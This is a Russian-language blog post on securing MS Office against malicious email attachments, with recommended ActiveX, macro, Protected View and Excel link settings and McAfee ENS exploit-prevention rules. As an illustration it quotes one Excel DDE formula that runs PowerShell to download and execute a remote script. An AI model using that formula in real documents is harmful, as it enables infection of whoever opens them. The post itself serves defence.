Главная

Monday, 12 July 2021

Безопасность в MS Office.


Всем привет.

Как показывает практика популярным потоком заражения любой компании вирусом является  путь забрасывания файлов (обычно email) как документов на канцелярию, бухгалтерию, и, реже, на само руководство. Руководство на такие документы ведется редко, а вот какой-нибудь бухгалтер может с перепугу и открыть его если в теме будет красоваться типа "Неуплаченные налоги на...".

Поэтому правильная настройка офисных инструментов это половина успеха, вторая половина это обучаемость персонала как минимум не открывать документы полученные по почте, если там вдруг всплывает просьба о включении макроса или обновления внешних связей. Потму как, к примеру, наш добрый Excel легко допускает в формулах такое:

=cmd|' /c C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -nop -NoExit -c IEX ((new-object net.webclient).downloadstring(\"http://cloudfront.com/1.dat\"))'|A0'

Про самообучаемость я писал ранее, а сегодня говорим про техническую сторону зашиты, по презентации Владислава Радецкого.

Что же следует сделать в MS Office? Определить следующие параметры.

Параметры ActiveX/Параметры для все пpиложений Office:

Выбрано - выводить запрос перед включением всех элементов управления с миниимальными ограничениями

Включено - безопасный режим (помогает ограничить доступ элементов управления к вашему компьютеру)

Защищенный просмотр: выбраны все три.

Для MS Word -

Параметры макросов:

Выбрано  - Отключить все макросы с уведомлением

Отключено - Доверять доступ к обьектной модели проектов VBA.

Для MS Excel -

Внешнее содержимое/Параметры безопасности на подключение к данным:

выбрано - запрос на подключение к данным.

Параметры безопасности для связей в книге:

выбрано - запрос на автоматическое обновление связей в книге.


Если вы используете McAfee ENS, то активировать следующие политики в Policy Category/ Exploit Prevention для всех типов обьектов:

6131 T1047 - Weaponized OLE object infection via WMI: Block+Report

6109 T1407 - Powershell - Suspicious wmi script execution: Block+Report

6108 Powershell - Suspicious downloading string execution: Block+Report

6127 Suspicous LSASS Access from Powershell: Block+Report

Успехов!

No comments:

Post a Comment

А что вы думаете по этому поводу?